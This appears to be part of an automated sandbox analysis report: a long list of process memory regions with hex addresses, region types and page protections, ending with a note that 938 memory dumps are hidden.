heap
page read and write
CC3B17E000
stack
page read and write
A17000
heap
page read and write
6604000
heap
page read and write
23FE000
stack
page read and write
1ABE67E9000
heap
page read and write
1ABE8711000
heap
page read and write
4E0000
heap
page read and write
A4D000
trusted library allocation
page execute and read and write
7420000
trusted library allocation
page read and write
1ABE88CE000
heap
page read and write
940E000
stack
page read and write
53AF000
stack
page read and write
33A4000
heap
page read and write
A19000
heap
page read and write
3079000
stack
page read and write
1ABE86E1000
heap
page read and write
1ABE6822000
heap
page read and write
662A000
heap
page read and write
7FFD9BC40000
trusted library allocation
page read and write
AE9000
heap
page read and write
889000
heap
page read and write
1ABE86ED000
heap
page read and write
6615000
heap
page read and write
2C70000
heap
page read and write
6B70000
direct allocation
page read and write
1ABE8893000
heap
page read and write
CC3ABCE000
stack
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
2B7C0979000
heap
page read and write
4889000
heap
page read and write
644000
heap
page read and write
2E2E000
stack
page read and write
645000
heap
page read and write
CC3B0FE000
stack
page read and write
23AE000
unkown
page read and write
A01000
heap
page read and write
A00000
heap
page read and write
6621000
heap
page read and write
2B7A66BE000
heap
page read and write
1ABE8711000
heap
page read and write
1ABE8848000
heap
page read and write
662C000
heap
page read and write
1ABE6A10000
heap
page read and write
4A80000
trusted library allocation
page read and write
9082000
heap
page read and write
1ABE8833000
heap
page read and write
2B7A66C4000
heap
page read and write
1ABE8802000
heap
page read and write
1ABE889E000
heap
page read and write
1ABE88CA000
heap
page read and write
228FA000
heap
page read and write
934E000
stack
page read and write
1ABE86EF000
heap
page read and write
644000
heap
page read and write
A1D000
heap
page read and write
1ABE67D9000
heap
page read and write
1ABE6825000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
1ABE6758000
heap
page read and write
7FFD9BCF0000
trusted library allocation
page read and write
A95000
heap
page read and write
33A4000
heap
page read and write
645000
heap
page read and write
1ABE8833000
heap
page read and write
1ABE8809000
heap
page read and write
A1D000
heap
page read and write
32A0000
heap
page read and write
7FFD9BB40000
trusted library allocation
page execute and read and write
749B000
stack
page read and write
2311D000
heap
page read and write
94A0000
direct allocation
page read and write
1ABE6828000
heap
page read and write
A16000
heap
page read and write
22671000
heap
page read and write
1E158600000
heap
page read and write
7E30000
heap
page read and write
4641000
heap
page read and write
2B7C065E000
heap
page read and write
2B7B84CB000
trusted library allocation
page read and write
A14000
heap
page read and write
45C000
system
page execute and read and write
26BC000
heap
page read and write
23186000
heap
page read and write
CC3AE7E000
stack
page read and write
2B7A88E4000
trusted library allocation
page read and write
A1B000
heap
page read and write
662C000
heap
page read and write
190000
heap
page readonly
7FFD9BCB0000
trusted library allocation
page read and write
473000
system
page execute and read and write
7FFD9BAA0000
trusted library allocation
page execute and read and write
45D000
system
page execute and read and write
7FFD9BC70000
trusted library allocation
page read and write
1ABE6700000
heap
page read and write
9480000
direct allocation
page read and write
93B0000
trusted library allocation
page read and write
A43000
trusted library allocation
page execute and read and write
1ABE682D000
heap
page read and write
22DF2000
heap
page read and write
1ABE88D3000
heap
page read and write
C75000
heap
page execute and read and write
2B40000
heap
page read and write
A87000
heap
page read and write
4884000
heap
page read and write
5A6E000
trusted library allocation
page read and write
1ABE682E000
heap
page read and write
33A4000
heap
page read and write
1ABE8833000
heap
page read and write
73F0000
trusted library allocation
page read and write
7FFD9BB50000
trusted library allocation
page execute and read and write
1ABE67CC000
heap
page read and write
1ABE88CE000
heap
page read and write
1ABE8711000
heap
page read and write
4A80000
trusted library allocation
page read and write
1ABE88B2000
heap
page read and write
70FA000
heap
page read and write
113000
stack
page read and write
1ABE8833000
heap
page read and write
A17000
heap
page read and write
1ABE88C1000
heap
page read and write
22F0E000
heap
page read and write
1ABE6802000
heap
page read and write
1ABE881E000
heap
page read and write
1ABE884B000
heap
page read and write
400000
system
page execute and read and write
7DF4EB590000
trusted library allocation
page execute and read and write
7E27000
stack
page read and write
1ABE86E7000
heap
page read and write
6621000
heap
page read and write
1ABE6A1B000
heap
page read and write
BA0000
heap
page readonly
1ABE8874000
heap
page read and write
A01000
heap
page read and write
23D21000
heap
page read and write
644000
heap
page read and write
662A000
heap
page read and write
1ABE88B0000
heap
page read and write
6BB0000
direct allocation
page read and write
1ABE8837000
heap
page read and write
1ABE86F5000
heap
page read and write
A80000
heap
page read and write
33C0000
heap
page read and write
A35000
heap
page read and write
1ABE8882000
heap
page read and write
662C000
heap
page read and write
5E0000
heap
page read and write
A5A000
heap
page read and write
6F6E000
stack
page read and write
2F6F000
unkown
page read and write
1ABE67A9000
heap
page read and write
1ABE8821000
heap
page read and write
7FFD9BC80000
trusted library allocation
page read and write
61C39FE000
stack
page read and write
1ABE88C3000
heap
page read and write
2B7A6670000
heap
page read and write
1ABE88C1000
heap
page read and write
4643000
heap
page read and write
3710000
heap
page read and write
1ABE8709000
heap
page read and write
7FFD9B9DC000
trusted library allocation
page execute and read and write
1ABE8882000
heap
page read and write
47B9000
heap
page read and write
F7000
stack
page read and write
2B7A8160000
heap
page read and write
306F000
stack
page read and write
9D9000
heap
page read and write
5F0000
trusted library allocation
page read and write
2BC0000
heap
page read and write
2B7C0777000
heap
page execute and read and write
31E0000
heap
page read and write
1ABE88CE000
heap
page read and write
4FE000
heap
page read and write
57D1000
trusted library allocation
page read and write
1ABE86EB000
heap
page read and write
357F000
stack
page read and write
938C000
stack
page read and write
1ABE8711000
heap
page read and write
1ABE8893000
heap
page read and write
1ABE6A1E000
heap
page read and write
1ABE88C6000
heap
page read and write
A08000
heap
page read and write
1ABE6A1A000
heap
page read and write
1ABE6826000
heap
page read and write
2B7AA1CC000
trusted library allocation
page read and write
6621000
heap
page read and write
1ABE8882000
heap
page read and write
662E000
heap
page read and write
C50000
trusted library allocation
page read and write
61C3EFB000
stack
page read and write
1ABE82A0000
heap
page read and write
7FFD9BC60000
trusted library allocation
page read and write
1E15841A000
heap
page read and write
1ABE895A000
heap
page read and write
1ABE873B000
heap
page read and write
1ABE88B3000
heap
page read and write
7FFD9BCD0000
trusted library allocation
page read and write
29AF000
stack
page read and write
1ABE881F000
heap
page read and write
5D0000
heap
page read and write
A00000
heap
page read and write
84C09FF000
stack
page read and write
7FFD9BC20000
trusted library allocation
page read and write
6E6E000
stack
page read and write
9092000
heap
page read and write
2B7A6880000
heap
page execute and read and write
1ABE8833000
heap
page read and write
1ABE889E000
heap
page read and write
23695000
heap
page read and write
7440000
trusted library allocation
page read and write
31DE000
stack
page read and write
226E8000
heap
page read and write
9390000
trusted library allocation
page read and write
A4E000
heap
page read and write
61C3AFD000
stack
page read and write
1ABE88C0000
heap
page read and write
1ABE895B000
heap
page read and write
2B7B84BD000
trusted library allocation
page read and write
A11000
heap
page read and write
2A8D000
stack
page read and write
7387000
trusted library allocation
page read and write
2B7A8CA5000
trusted library allocation
page read and write
466E000
stack
page read and write
7FFD9B99B000
trusted library allocation
page read and write
644000
heap
page read and write
644000
heap
page read and write
228F1000
heap
page read and write
2B7A66D8000
heap
page read and write
4881000
heap
page read and write
1ABE67D9000
heap
page read and write
2B7A66B7000
heap
page read and write
1ABE6900000
heap
page read and write
1ABE8846000
heap
page read and write
660C000
heap
page read and write
61C34F9000
stack
page read and write
23318000
heap
page read and write
A10000
heap
page read and write
22585000
heap
page read and write
662A000
heap
page read and write
229E3000
heap
page read and write
6B40000
direct allocation
page read and write
1ABE888B000
heap
page read and write
1ABE682E000
heap
page read and write
1ABE66F0000
heap
page read and write
229FB000
heap
page read and write
A11000
heap
page read and write
6630000
heap
page read and write
662A000
heap
page read and write
A19000
heap
page read and write
8020000
heap
page read and write
1ABE8887000
heap
page read and write
A0E000
heap
page read and write
6630000
heap
page read and write
7380000
trusted library allocation
page read and write
B75000
trusted library allocation
page execute and read and write
2B7AA216000
trusted library allocation
page read and write
4640000
heap
page read and write
1ABE881D000
heap
page read and write
1ABE67A7000
heap
page read and write
9D0000
heap
page read and write
645000
heap
page read and write
2B7C0810000
heap
page read and write
1ABE88C6000
heap
page read and write
1ABE88CE000
heap
page read and write
1ABE6A15000
heap
page read and write
7FFD9BB80000
trusted library allocation
page read and write
1ABE8739000
heap
page read and write
228F3000
heap
page read and write
1ABE882E000
heap
page read and write
1ABE8711000
heap
page read and write
1ABE86ED000
heap
page read and write
C40000
trusted library allocation
page read and write
22671000
heap
page read and write
2B7A6700000
heap
page read and write
1ABE8711000
heap
page read and write
A11000
heap
page read and write
9DB000
heap
page read and write
81F000
stack
page read and write
2B7AA384000
trusted library allocation
page read and write
CC3C14D000
stack
page read and write
1ABE884B000
heap
page read and write
9E30000
direct allocation
page execute and read and write
7FFD9BB3A000
trusted library allocation
page read and write
33A4000
heap
page read and write
94B0000
direct allocation
page read and write
1ABE8815000
heap
page read and write
1ABE86F0000
heap
page read and write
4919000
trusted library allocation
page read and write
2B7A8080000
trusted library allocation
page read and write
1ABE69C0000
remote allocation
page read and write
83E000
stack
page read and write
99E000
stack
page read and write
2B7A8CDA000
trusted library allocation
page read and write
23418000
heap
page read and write
1ABE8802000
heap
page read and write
2B7A870F000
trusted library allocation
page read and write
644000
heap
page read and write
1ABE8701000
heap
page read and write
1ABE88D3000
heap
page read and write
23D7A000
heap
page read and write
33A4000
heap
page read and write
A8A000
heap
page read and write
6604000
heap
page read and write
A1D000
heap
page read and write
1ABE8833000
heap
page read and write
8739000
trusted library allocation
page read and write
644000
heap
page read and write
2FB0000
heap
page read and write
4641000
heap
page read and write
2F49000
stack
page read and write
644000
heap
page read and write
A10000
heap
page read and write
10F000
stack
page read and write
7FFD9B983000
trusted library allocation
page execute and read and write
B90000
trusted library allocation
page read and write
35CC000
heap
page read and write
645000
heap
page read and write
61C35FF000
stack
page read and write
9D7000
heap
page read and write
1ABE884B000
heap
page read and write
A39000
heap
page read and write
907E000
heap
page read and write
33A4000
heap
page read and write
29CD000
stack
page read and write
A19000
heap
page read and write
4641000
heap
page read and write
456A000
heap
page read and write
4881000
heap
page read and write
CC3B5FE000
stack
page read and write
46EE000
stack
page read and write
2B8D000
stack
page read and write
7FFD9BA36000
trusted library allocation
page read and write
1ABE88C6000
heap
page read and write
8543000
trusted library allocation
page read and write
487F000
stack
page read and write
640000
heap
page read and write
7FFD9BC00000
trusted library allocation
page read and write
94C0000
direct allocation
page read and write
7175000
heap
page read and write
2277E000
heap
page read and write
35C3000
heap
page read and write
DC000
stack
page read and write
6613000
heap
page read and write
6630000
heap
page read and write
35C0000
heap
page read and write
A50000
trusted library allocation
page read and write
6624000
heap
page read and write
1ABE88B3000
heap
page read and write
6613000
heap
page read and write
7FFD9B98D000
trusted library allocation
page execute and read and write
2B7AA211000
trusted library allocation
page read and write
7350000
trusted library allocation
page read and write
7FFD9BCA0000
trusted library allocation
page read and write
6FAE000
stack
page read and write
22671000
heap
page read and write
1ABE682E000
heap
page read and write
1ABE88B8000
heap
page read and write
1ABE88C7000
heap
page read and write
BFE000
stack
page read and write
3260000
heap
page read and write
1ABE67A3000
heap
page read and write
22580000
heap
page read and write
1ABE895B000
heap
page read and write
AD000
stack
page read and write
880000
heap
page read and write
1ABE88C6000
heap
page read and write
210000
heap
page read and write
B72000
trusted library allocation
page read and write
7FFD9BC30000
trusted library allocation
page read and write
2B7AA3EA000
trusted library allocation
page read and write
61C3BFB000
stack
page read and write
84C05FD000
stack
page read and write
1ABE8874000
heap
page read and write
C80000
heap
page read and write
7FFD9BC50000
trusted library allocation
page read and write
6615000
heap
page read and write
4A80000
trusted library allocation
page read and write
57C1000
trusted library allocation
page read and write
1ABE86FA000
heap
page read and write
2B7A67A0000
heap
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
323E000
stack
page read and write
4881000
heap
page read and write
2D8E000
stack
page read and write
2C50000
heap
page read and write
2B7C09C2000
heap
page read and write
1ABE682E000
heap
page read and write
1ABE67E9000
heap
page read and write
1ABE6A18000
heap
page read and write
A00000
heap
page read and write
1ABE8711000
heap
page read and write
22C7E000
heap
page read and write
2B7A667E000
heap
page read and write
9038000
heap
page read and write
1ABE8863000
heap
page read and write
1ABE8930000
heap
page read and write
1ABE86E0000
heap
page read and write
6624000
heap
page read and write
1E0000
heap
page read and write
2B7C0998000
heap
page read and write
6C3A000
stack
page read and write
B70000
trusted library allocation
page read and write
5171000
heap
page read and write
2DD0000
heap
page read and write
1E1587A5000
heap
page read and write
1ABE8739000
heap
page read and write
2B7A81C0000
heap
page read and write
8031000
trusted library allocation
page read and write
7165000
heap
page read and write
645000
heap
page read and write
72CF000
stack
page read and write
A19000
heap
page read and write
2CC4000
heap
page read and write
1ABE6730000
heap
page read and write
1ABE88E1000
heap
page read and write
1ABE881F000
heap
page read and write
1ABE8893000
heap
page read and write
23180000
heap
page read and write
2CA0000
heap
page read and write
1ABE67CA000
heap
page read and write
1ABE89B6000
heap
page read and write
1ABE88E1000
heap
page read and write
2B7C06F0000
heap
page read and write
2B7C068E000
heap
page read and write
4889000
heap
page read and write
710D000
heap
page read and write
51C000
stack
page read and write
1ABE6822000
heap
page read and write
33A4000
heap
page read and write
1ABE88CA000
heap
page read and write
4888000
heap
page read and write
6B60000
direct allocation
page read and write
1ABE88B3000
heap
page read and write
22C15000
heap
page read and write
7FFD9BC10000
trusted library allocation
page read and write
87E000
stack
page read and write
2B7A8CBE000
trusted library allocation
page read and write
2B7C0770000
heap
page execute and read and write
9030000
heap
page read and write
9460000
trusted library allocation
page read and write
2B7A80B0000
trusted library allocation
page read and write
7173000
heap
page read and write
336F000
stack
page read and write
A97000
heap
page read and write
A01000
heap
page read and write
1ABE88CE000
heap
page read and write
A1D000
heap
page read and write
A28000
heap
page read and write
1ABE6783000
heap
page read and write
2C3D000
stack
page read and write
1ABE8711000
heap
page read and write
1ABE88B8000
heap
page read and write
1ABE67BE000
heap
page read and write
A97000
heap
page read and write
2B7A8B06000
trusted library allocation
page read and write
1ABE86E2000
heap
page read and write
582A000
trusted library allocation
page read and write
1ABE88BD000
heap
page read and write
2B7A9F8D000
trusted library allocation
page read and write
22571000
heap
page read and write
481D000
trusted library allocation
page read and write
1ABE67CA000
heap
page read and write
57E9000
trusted library allocation
page read and write
7F95000
trusted library allocation
page read and write
2B7A6820000
trusted library allocation
page read and write
CC3AEFE000
stack
page read and write
22DFD000
heap
page read and write
2FB0000
heap
page read and write
A19000
heap
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
1DE000
stack
page read and write
2CC2000
heap
page read and write
1ABE88B3000
heap
page read and write
1ABE8882000
heap
page read and write
9DF000
stack
page read and write
2C4E000
unkown
page read and write
2B7A67E0000
trusted library allocation
page read and write
22671000
heap
page read and write
2B7C09A7000
heap
page read and write
41B000
system
page execute and read and write
1ABE682E000
heap
page read and write
456000
system
page execute and read and write
55D000
stack
page read and write
A60000
heap
page read and write
A8A000
heap
page read and write
1ABE88AD000
heap
page read and write
1ABE6A19000
heap
page read and write
1ABE88BB000
heap
page read and write
2B7A86FB000
trusted library allocation
page read and write
1ABE881A000
heap
page read and write
2B7B84DB000
trusted library allocation
page read and write
5E0000
trusted library allocation
page read and write
A01000
heap
page read and write
1ABE678E000
heap
page read and write
1ABE8833000
heap
page read and write
1ABE67F4000
heap
page read and write
1ABE67CA000
heap
page read and write
9EC3000
direct allocation
page execute and read and write
32A8000
heap
page read and write
4D38000
heap
page read and write
22571000
heap
page read and write
B2C3000
direct allocation
page execute and read and write
1ABE8813000
heap
page read and write
87BC000
trusted library allocation
page read and write
9E0000
heap
page read and write
61C36FE000
stack
page read and write
C3E000
stack
page read and write
2B7A68B0000
heap
page execute and read and write
71E7000
trusted library allocation
page read and write
728E000
stack
page read and write
400000
system
page execute and read and write
2DE0000
heap
page read and write
1E1585E0000
heap
page read and write
7FFC000
stack
page read and write
1ABE8814000
heap
page read and write
A05000
heap
page read and write
1ABE69C0000
remote allocation
page read and write
6616000
heap
page read and write
1ABE882D000
heap
page read and write
1ABE8848000
heap
page read and write
A1C000
heap
page read and write
33DC000
heap
page read and write
A30000
trusted library allocation
page read and write
1ABE87E1000
heap
page read and write
A01000
heap
page read and write
6B80000
direct allocation
page read and write
9DE000
heap
page read and write
1ABE88A6000
heap
page read and write
84C08FF000
unkown
page read and write
7FFD9BA3C000
trusted library allocation
page execute and read and write
23303000
heap
page read and write
1AE000
stack
page read and write
7F10000
heap
page read and write
1ABE6783000
heap
page read and write
6FC1000
heap
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
1ABE8882000
heap
page read and write
944C000
stack
page read and write
2382F000
heap
page read and write
4880000
heap
page read and write
71B0000
trusted library allocation
page read and write
462E000
stack
page read and write
3190000
heap
page readonly
1ABE88C7000
heap
page read and write
3110000
heap
page read and write
6EAA000
stack
page read and write
1ABE8807000
heap
page read and write
303C000
stack
page read and write
A29000
heap
page read and write
1ABE67CC000
heap
page read and write
1ABE880A000
heap
page read and write
A2B000
heap
page read and write
46AE000
stack
page read and write
2FB8000
heap
page read and write
1ABE86FD000
heap
page read and write
A0E000
heap
page read and write
662C000
heap
page read and write
1ABE882B000
heap
page read and write
2330C000
heap
page read and write
7F0E000
stack
page read and write
A28000
heap
page read and write
52AE000
stack
page read and write
A11000
heap
page read and write
1ABE8739000
heap
page read and write
7400000
trusted library allocation
page read and write
94D0000
direct allocation
page read and write
5171000
heap
page read and write
2362C000
heap
page read and write
B4C000
heap
page read and write
1ABE69C0000
remote allocation
page read and write
180000
heap
page read and write
2B7C09B7000
heap
page read and write
93C0000
trusted library allocation
page read and write
A19000
heap
page read and write
6630000
heap
page read and write
1ABE8711000
heap
page read and write
23697000
heap
page read and write
2B7AA19F000
trusted library allocation
page read and write
A11000
heap
page read and write
A2C000
heap
page read and write
9074000
heap
page read and write
1ABE86E5000
heap
page read and write
2B7C0971000
heap
page read and write
2B7C0C50000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
644000
heap
page read and write
9F0000
heap
page read and write
2B7A6560000
heap
page read and write
9D9000
heap
page read and write
A11000
heap
page read and write
1ABE86ED000
heap
page read and write
5170000
heap
page read and write
70B9000
heap
page read and write
6615000
heap
page read and write
2B7B81D1000
trusted library allocation
page read and write
A59000
trusted library allocation
page read and write
6604000
heap
page read and write
6B90000
direct allocation
page read and write
22C7E000
heap
page read and write
220000
heap
page read and write
1ABE8814000
heap
page read and write
A08000
heap
page read and write
734D000
stack
page read and write
33A4000
heap
page read and write
33A4000
heap
page read and write
22585000
heap
page read and write
2B7C0950000
heap
page read and write
1ABE88A3000
heap
page read and write
1ABE8833000
heap
page read and write
7E40000
trusted library allocation
page execute and read and write
1ABE6737000
heap
page read and write
1ABE8882000
heap
page read and write
1ABE67CC000
heap
page read and write
1ABE8880000
heap
page read and write
1ABE88CB000
heap
page read and write
A0E000
heap
page read and write
2B7AA3D6000
trusted library allocation
page read and write
22C14000
heap
page read and write
7FFD9BD00000
trusted library allocation
page read and write
A20000
trusted library section
page read and write
2B7A68D5000
heap
page read and write
7FFD9BB31000
trusted library allocation
page read and write
5E0000
heap
page read and write
2B7AA1B6000
trusted library allocation
page read and write
2B7C0629000
heap
page read and write
1ABE8887000
heap
page read and write
A01000
heap
page read and write
A0F000
heap
page read and write
A87000
heap
page read and write
A79000
heap
page read and write
2B7C0949000
heap
page read and write
6604000
heap
page read and write
CC3B4FE000
stack
page read and write
2B7C0620000
heap
page read and write
22DFF000
heap
page read and write
1ABE86E4000
heap
page read and write
2E6F000
stack
page read and write
ECC000
stack
page read and write
BCC3000
direct allocation
page execute and read and write
6621000
heap
page read and write
33C8000
heap
page read and write
22585000
heap
page read and write
4A80000
trusted library allocation
page read and write
A10000
heap
page read and write
1ABE88E1000
heap
page read and write
7FFD9BB70000
trusted library allocation
page execute and read and write
7410000
trusted library allocation
page read and write
644000
heap
page read and write
A19000
heap
page read and write
71F0000
trusted library allocation
page read and write
2B7A9D9C000
trusted library allocation
page read and write
33A0000
heap
page read and write
1ABE8882000
heap
page read and write
22671000
heap
page read and write
CC3C1CA000
stack
page read and write
7F3D0000
trusted library allocation
page execute and read and write
7ECD000
stack
page read and write
662C000
heap
page read and write
1ABE88CA000
heap
page read and write
A23000
heap
page read and write
662A000
heap
page read and write
7FFD9BC90000
trusted library allocation
page read and write
6624000
heap
page read and write
1ABE67CA000
heap
page read and write
23B0000
heap
page read and write
6603000
heap
page read and write
A28000
heap
page read and write
1ABE884B000
heap
page read and write
6CD0000
heap
page read and write
1ABE67FE000
heap
page read and write
4881000
heap
page read and write
71D0000
trusted library allocation
page read and write
1ABE890C000
heap
page read and write
6613000
heap
page read and write
73B0000
trusted library allocation
page read and write
F0E000
stack
page read and write
2B7C0623000
heap
page read and write
1E158410000
heap
page read and write
A00000
heap
page read and write
1E1583F0000
heap
page read and write
1ABE682E000
heap
page read and write
2B7A6706000
heap
page read and write
2C9E000
stack
page read and write
1ABE8833000
heap
page read and write
1ABE884B000
heap
page read and write
1ABE8876000
heap
page read and write
229F1000
heap
page read and write
1ABE88A6000
heap
page read and write
8010000
trusted library allocation
page execute and read and write
2FD0000
heap
page read and write
A80000
heap
page read and write
2CAB000
heap
page read and write
7FFD9BB20000
trusted library allocation
page read and write
7FFD9BB62000
trusted library allocation
page read and write
905B000
heap
page read and write
6B50000
direct allocation
page read and write
1ABE6783000
heap
page read and write
645000
heap
page read and write
A00000
heap
page read and write
A1C000
heap
page read and write
1ABE88E0000
heap
page read and write
2B7A8255000
trusted library allocation
page read and write
F10000
trusted library allocation
page read and write
There are 938 hidden memdumps, click here to show them.